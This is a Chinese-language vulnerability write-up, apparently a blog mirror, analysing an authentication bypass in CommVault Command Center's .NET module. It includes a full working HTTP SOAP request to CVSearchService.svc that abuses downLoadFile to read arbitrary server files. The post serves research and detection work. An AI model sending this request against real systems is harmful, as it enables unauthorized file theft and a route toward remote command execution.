CommVault Command Center Pre-Auth Rce
source link: https://y4er.com/post/commvault-command-center-pre-auth-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CommVault Command Center Pre-Auth Rce
2021-11-25 代码审计 rce java dotnetCommVault这玩意是两种语言(.net和java)开发的,两掺挺有意思。
安装会自动更新 恶心坏了 只能在更新打补丁前先把dll拷出来然后再覆盖进去。
整个流程就是从一个权限绕过到文件读取,然后读用户密码拿到token,(java)最后通过api执行命令。只分析前半段,因为后半段java的源码被自动更新覆盖了,复现不了。
查看iis配置发现在81端口开放了多个虚拟目录,其中一个映射到了C:\Program Files\Commvault\ContentStore\CVSearchService
查看web.config中,使用CVInfoMgmtService.CVAuthHttpModulemodule来做权限校验。
CVAuthHttpModule类的Init中注册了几个事件OnEnter
在OnEnter中根据this.reject布尔值来判断是否拒绝访问,我们需要构造this.reject=false
this.reject在此处根据三个条件判断
- text!=null
- !flag3 ==true
- NonSecureOperations.canByPassCheck(text) == true
text值取自CVAuthHttpModule.readHeader()
跟进发现是从cookie中取
那么第一个条件随便满足,然后看NonSecureOperations.canByPassCheck(text) == true
canByPassCheck()先对传入参数解码,然后判断自身list中是否存在,如果存在极为true,而encodePass()函数就是base64解码而已
那么第三个条件满足,看第二个条件!flag3 ==true
flag3变量取自bool flag3 = this.IsRestWebService();
获取当前uri判断是否以CVWEBSERVICE.SVC结尾,那么我们可以用CVSearchService.svc。所以这里就有了一个权限绕过,可以访问CVSearchService.svc下的服务。
这有个文件读取。请求包如下
POST /SearchSvc/CVSearchService.svc HTTP/1.1
Host: 192.168.137.173:81
cookie: DataService.PopulateData
Connection: close
Content-Type: text/xml
soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
Content-Length: 338
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:downLoadFile>
<tem:path>c:/Program Files/Commvault/ContentStore/Log Files/WebServer.log</tem:path>
</tem:downLoadFile>
</soapenv:Body>
</soapenv:Envelope>
nuclei已经有pr提交了 https://github.com/projectdiscovery/nuclei-templates/pull/3182/files
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK